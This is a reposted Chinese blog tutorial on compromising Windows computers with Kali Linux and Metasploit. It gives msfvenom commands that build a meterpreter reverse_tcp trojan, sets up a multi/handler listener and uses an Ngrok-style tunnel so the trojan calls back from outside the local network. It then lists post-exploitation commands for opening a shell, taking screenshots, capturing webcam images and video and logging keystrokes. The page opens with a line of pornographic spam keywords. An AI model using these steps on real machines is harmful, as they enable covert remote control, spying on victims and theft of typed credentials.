国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

kali滲透內(nèi)網(wǎng)和外網(wǎng)

這篇具有很好參考價(jià)值的文章主要介紹了kali滲透內(nèi)網(wǎng)和外網(wǎng)。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問(wèn)。

生成木馬文件,從而控制對(duì)方電腦(這里只能在同一個(gè)局域網(wǎng)下才能入侵)

第一步:輸入msfvenom命令生成一個(gè)payload,相關(guān)參數(shù)與命令如下:

-p:使用反向遠(yuǎn)程控制程序“windows/meterpreter/reverse_tcp”

lhost:設(shè)置kali的IP

lport:設(shè)置端口(要與下面的setlport保持一致)

-f:文件的類(lèi)型為exe類(lèi)型

-o:生成payload,名為payload.exe,保存在kali的/root目錄下

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.77 lport=5000 -f exe -o /root/tjy.exe

第二步:將生成的木馬文件發(fā)送到對(duì)方電腦

我們啟動(dòng)kali

msfconsole 進(jìn)入msfconsole

use exploit/multi/handler 使用這個(gè)漏洞輔助

kali滲透內(nèi)網(wǎng)和外網(wǎng)

設(shè)置payload為剛才反向遠(yuǎn)程控制程序名稱(windows/meterpreter/reverse_tcp)

set payload windows/meterpreter/reverse_tcp

設(shè)置一個(gè)lhost和lport,要與文章最開(kāi)始的msfvenom命令中的IP和端口保持一致

kali滲透內(nèi)網(wǎng)和外網(wǎng)

exploit 或 run

kali滲透內(nèi)網(wǎng)和外網(wǎng)

接下來(lái)我們只要等對(duì)方電腦運(yùn)行剛剛那個(gè)木馬

生成木馬文件,從而控制對(duì)方電腦(內(nèi)網(wǎng)可以入侵外網(wǎng))

在開(kāi)始生成木馬之前,我們要先做好準(zhǔn)備工作

在kali里面要下載Sunny-Ngrok的Linux64版本,下載好后解壓

接著我們要在Sunny-Ngrok注冊(cè)登陸,這里要買(mǎi)個(gè)隧道,但是免費(fèi)的,就是認(rèn)證要花2元,這個(gè)隧道是幫助我們做內(nèi)網(wǎng)穿透的,但這個(gè)免費(fèi)的隧道服務(wù)器在美國(guó)那邊,所以有的時(shí)候可能不太好用

kali滲透內(nèi)網(wǎng)和外網(wǎng)

這里將下載好的linux64壓縮包進(jìn)行解壓

命令解壓縮:unzip linux_amd64(壓縮包名)

kali滲透內(nèi)網(wǎng)和外網(wǎng)

進(jìn)入解壓好的目錄

cd linux_amd64

啟動(dòng)隧道映射TCP服務(wù)

./sunny clientid (隧道id) 這里的隧道id看下圖

kali滲透內(nèi)網(wǎng)和外網(wǎng)

啟動(dòng)后是這樣的

kali滲透內(nèi)網(wǎng)和外網(wǎng)

接下來(lái)就是生成外網(wǎng)的木馬程序了

注意:這里lhost和lport分別為贈(zèng)送的域名和端口

msfvenom -p windows/meterpreter/reverse_tcplhost=xxx.xxx.com lport=10306 -f exe -o /root/shell.exe

kali滲透內(nèi)網(wǎng)和外網(wǎng)

接下來(lái)就是在msf中設(shè)置payload,加載攻擊模塊設(shè)置本地IP何監(jiān)聽(tīng)端口了

msfconsole 打開(kāi)msf

use exploit/multi/handler 使用這個(gè)漏洞輔助

set payload windows/meterpreter/reverse_tcp 設(shè)置payload為剛才反向遠(yuǎn)程控制程序名稱(windows/meterpreter/reverse_tcp)

set LHOST 192.168.245.140 這里設(shè)置成kali的IP

set LPORT 4444 這里是你要偵聽(tīng)的端口

這里設(shè)置的IP和偵聽(tīng)的端口后生成外網(wǎng)木馬程序時(shí)的IP和端口時(shí)不一樣的,因?yàn)槲覀冞@是內(nèi)網(wǎng)入侵外網(wǎng)

show options 查看IP端口設(shè)置情況

exploit 或 run 開(kāi)啟偵聽(tīng)

接下來(lái)我們只要等對(duì)方電腦運(yùn)行剛剛那個(gè)木馬

成功后時(shí)以下這圖

kali滲透內(nèi)網(wǎng)和外網(wǎng)

入侵成功后所能做的(這只是可以做的一部分)

getuid 獲取靶機(jī)uidmeterpreter

shell 進(jìn)入靶機(jī)shellmeterpreter

screenshot 靶機(jī)截屏meterpreter

webcam_snap 用靶機(jī)攝像頭拍照meterpreter

webcam_stream 用靶機(jī)攝像頭錄像meterpreter

keyscan_start 開(kāi)啟鍵盤(pán)記錄meterpreter

keyscan_dump 捕獲鍵盤(pán)記錄

keyscan_stop 停止鍵盤(pán)記錄文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-475800.html

到了這里,關(guān)于kali滲透內(nèi)網(wǎng)和外網(wǎng)的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來(lái)自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • 路由表配置過(guò)程及多網(wǎng)卡同時(shí)使用內(nèi)網(wǎng)和外網(wǎng)全程圖解

    CMD命令:route 子命令1:route print 查看路由表 子命令2:route add 添加靜態(tài)路由 子命令3:route delete 刪除靜態(tài)路由 查看 使用子命令1結(jié)果如下圖 (注:紅框?yàn)閯?dòng)態(tài)路由[由系統(tǒng)管理,無(wú)需要人工管理],綠框?yàn)殪o態(tài)路由[可由人工自由增刪]) 可以看出路由表由以下幾部分組成:網(wǎng)絡(luò)

    2024年02月06日
    瀏覽(18)
  • 筆記本電腦同時(shí)訪問(wèn)wifi和有線網(wǎng)絡(luò)、內(nèi)網(wǎng)和外網(wǎng)配置教程

    1.一臺(tái)電腦同時(shí)訪問(wèn)內(nèi)網(wǎng)和外網(wǎng)(兩個(gè)網(wǎng)段);2.一臺(tái)電腦同時(shí)插著網(wǎng)線和wifi能夠同時(shí)使用。 1.win+R啟動(dòng)cmd運(yùn)行,在其中輸入“gpedit.msc”,進(jìn)入本地策略編輯器,在“計(jì)算機(jī)配置-管理模板-網(wǎng)絡(luò)-Windows連接管理器”中,點(diǎn)擊“設(shè)置-最小化到Internet或Windows域的同時(shí)連接數(shù)-編輯策

    2024年02月13日
    瀏覽(89)
  • Mac下雙網(wǎng)關(guān)設(shè)置(Wi-Fi 和網(wǎng)線同時(shí)訪問(wèn)內(nèi)網(wǎng)和外網(wǎng))

    Mac下雙網(wǎng)關(guān)設(shè)置(Wi-Fi 和網(wǎng)線同時(shí)訪問(wèn)內(nèi)網(wǎng)和外網(wǎng))

    公司為了安全,需要在內(nèi)網(wǎng)環(huán)境下使用云桌面進(jìn)行開(kāi)發(fā),但是連接網(wǎng)線后 WiFi 就失效,所以需要配置雙網(wǎng)關(guān)。 目的:通過(guò)無(wú)線訪問(wèn)外網(wǎng),有線訪問(wèn)ip地址以50開(kāi)頭的內(nèi)網(wǎng),且無(wú)線的優(yōu)先級(jí)高。 1.1:首先連接網(wǎng)線查看配置 記下ip 地址,子網(wǎng)掩碼和路由器。后面配置使用。 1.2:

    2024年02月08日
    瀏覽(19)
  • 關(guān)于win10、win11電腦同時(shí)使用有線、無(wú)線訪問(wèn)內(nèi)網(wǎng)和外網(wǎng)的配置方法

    關(guān)于win10、win11電腦同時(shí)使用有線、無(wú)線訪問(wèn)內(nèi)網(wǎng)和外網(wǎng)的配置方法

    PS:首先需要接通內(nèi)網(wǎng)網(wǎng)線,并連接外網(wǎng)wifi。(臺(tái)式電腦可以通過(guò)外置無(wú)線網(wǎng)卡實(shí)現(xiàn)連接外網(wǎng)wifi) ? ? 同時(shí)按下“win”+“R”鍵,輸入“cmd”并點(diǎn)擊“Enter”鍵或者“確定”按鈕; ? ? 輸入“route delete 0.0.0.0”并點(diǎn)擊“Enter”鍵; ? ? 輸入“route add 0.0.0.0 mask 0.0.0.0 192.168.0.1

    2024年02月09日
    瀏覽(24)
  • Kali linux windows木馬(外網(wǎng)) 保姆級(jí)教學(xué)

    Kali linux windows木馬(外網(wǎng)) 保姆級(jí)教學(xué)

    前言 實(shí)現(xiàn)外網(wǎng)控制需要一個(gè)外網(wǎng)的IP負(fù)責(zé)監(jiān)聽(tīng),本次使用的是https://www.fgnwct.com(飛鴿內(nèi)網(wǎng)穿透)有免費(fèi)的隧道 kali.org(kali官網(wǎng)) 詳細(xì)教程查詢官網(wǎng)。 此系列僅用于工作和學(xué)習(xí),禁止用于非法攻擊。一切遵守《網(wǎng)絡(luò)安全法》 環(huán)境 windows7 kali linux 2021 下載客戶端,解壓出文件 \\\'\\\'

    2023年04月26日
    瀏覽(30)
  • windows 11同時(shí)保持有線內(nèi)網(wǎng)和無(wú)線外網(wǎng)連接設(shè)置

    windows 11同時(shí)保持有線內(nèi)網(wǎng)和無(wú)線外網(wǎng)連接設(shè)置

    進(jìn)入組策略編輯器(僅專業(yè)版系統(tǒng)支持) 更改組策略-計(jì)算機(jī)配置-管理模板-網(wǎng)絡(luò)-Windows連接管理器-最小化到 Internet 或 Windows 域的同時(shí)連接數(shù):更改狀態(tài)為已啟用,值為0-允許同時(shí)連接。 更改有線網(wǎng)絡(luò)適配器躍點(diǎn)數(shù) 更改無(wú)線網(wǎng)絡(luò)適配器躍點(diǎn)數(shù)

    2024年02月11日
    瀏覽(26)
  • KaLi做木馬滲透實(shí)戰(zhàn)案例

    KaLi做木馬滲透實(shí)戰(zhàn)案例

    此文章可能會(huì)包含敏感以及危險(xiǎn)的命令???命令有風(fēng)險(xiǎn),回車(chē)需謹(jǐn)慎。 此文章僅供學(xué)習(xí)交流與參考使用,禁止運(yùn)用于任何非法行動(dòng)或測(cè)試中,若有預(yù)期之外的后果,將不承擔(dān)任何責(zé)任??! ┌──( root??KaLi-Erhe )-[ ~ ] └─# cat 重要的事情說(shuō)三遍 ??? ?命令有風(fēng)險(xiǎn),回車(chē)

    2024年02月11日
    瀏覽(27)
  • Kali Linux滲透測(cè)試小實(shí)踐——Metasploit與后門(mén)木馬

    Kali Linux滲透測(cè)試小實(shí)踐——Metasploit與后門(mén)木馬

    目錄 一、環(huán)境和工具準(zhǔn)備 1.Metasploit 2.Kali Linux與靶機(jī) 二、實(shí)踐過(guò)程 1.打開(kāi)Kali Linux,進(jìn)入終端 2.輸入生成木馬的命令,并配置相關(guān)參數(shù) Metasploit是一款開(kāi)源的安全漏洞檢測(cè)工具,可以幫助安全和IT專業(yè)人士識(shí)別安全性問(wèn)題,驗(yàn)證漏洞的緩解措施,并管理專家驅(qū)動(dòng)的安全性進(jìn)行評(píng)

    2024年02月13日
    瀏覽(31)
  • 只有1個(gè)公網(wǎng)IP地址---設(shè)置內(nèi)網(wǎng)服務(wù)器 +++ 華為路由器:外網(wǎng)可以訪問(wèn)內(nèi)網(wǎng)服務(wù)區(qū)---內(nèi)網(wǎng)服務(wù)區(qū)訪問(wèn)不了外網(wǎng)---內(nèi)網(wǎng)辦公區(qū)可以訪問(wèn)外網(wǎng)和內(nèi)網(wǎng)服務(wù)區(qū)(只有1個(gè)公網(wǎng)IP地址)

    只有1個(gè)公網(wǎng)IP地址---設(shè)置內(nèi)網(wǎng)服務(wù)器 +++ 華為路由器:外網(wǎng)可以訪問(wèn)內(nèi)網(wǎng)服務(wù)區(qū)---內(nèi)網(wǎng)服務(wù)區(qū)訪問(wèn)不了外網(wǎng)---內(nèi)網(wǎng)辦公區(qū)可以訪問(wèn)外網(wǎng)和內(nèi)網(wǎng)服務(wù)區(qū)(只有1個(gè)公網(wǎng)IP地址)

    1.公司只有一個(gè)公網(wǎng)IP地址66.66.66.66/24 同時(shí)滿足以下3點(diǎn):? 1.外網(wǎng)可以訪問(wèn)內(nèi)網(wǎng)服務(wù)區(qū)(DMZ); 2.內(nèi)網(wǎng)服務(wù)區(qū)(DMZ)無(wú)法訪問(wèn)外網(wǎng); 3.內(nèi)網(wǎng)辦公區(qū)可以訪問(wèn)外網(wǎng)和內(nèi)網(wǎng)服務(wù)區(qū)(DMZ)。 注釋:R:公司路由、ISP:電信路由、R3外網(wǎng)路由 1.配置PC、路由器接口IP地址; 具體配置見(jiàn)代碼

    2024年02月13日
    瀏覽(27)
  • 利用msf進(jìn)行內(nèi)網(wǎng)的木馬滲透詳細(xì)教程

    利用msf進(jìn)行內(nèi)網(wǎng)的木馬滲透詳細(xì)教程

    本文僅限學(xué)術(shù)交流,請(qǐng)勿用他人實(shí)踐 本文通過(guò)kali系統(tǒng)進(jìn)行內(nèi)網(wǎng)滲透。主機(jī) ip:172.20.10.14 靶機(jī)ip:172.20.10.3(win10)? 文章目錄 前言 一 準(zhǔn)備工作 二 進(jìn)行滲透 1.開(kāi)啟服務(wù):需要開(kāi)啟apache和postgresql服務(wù) 2.制作木馬文件,利用msf進(jìn)行滲透 總結(jié)? 提示:以下是本篇文章正文內(nèi)容,下

    2023年04月08日
    瀏覽(24)

覺(jué)得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包